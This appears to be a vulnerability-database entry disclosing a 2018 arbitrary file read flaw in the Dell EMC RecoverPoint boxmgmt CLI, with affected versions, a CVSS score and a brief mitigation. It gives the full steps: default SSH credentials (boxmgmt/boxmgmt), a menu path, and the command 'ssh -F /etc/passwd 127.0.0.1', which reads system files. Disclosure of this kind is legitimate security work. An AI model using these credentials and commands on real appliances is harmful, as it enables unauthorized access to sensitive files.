vendor:
RecoverPoint
by:
Paul Taylor
7.5
CVSS
HIGH
Arbitrary File Read
22
CWE
Product Name: RecoverPoint
Affected Version From: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
Affected Version To: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
Patch Exists: YES
Related CWE: N/A
CPE: a:dell:emc_recoverpoint
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
2018
Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read
When logging in as boxmgmt and running an internal command, the ssh command may be used to display the contents of files from the file system which are accessible to the boxmgmt user. Log in as boxmgmt via SSH (default credentials boxmgmt/boxmgmt) Select [3] Diagnostics Select [5] Run Internal Command ssh -F /etc/passwd 127.0.0.1
Mitigation:
Ensure that the boxmgmt user is not allowed to access sensitive files on the system.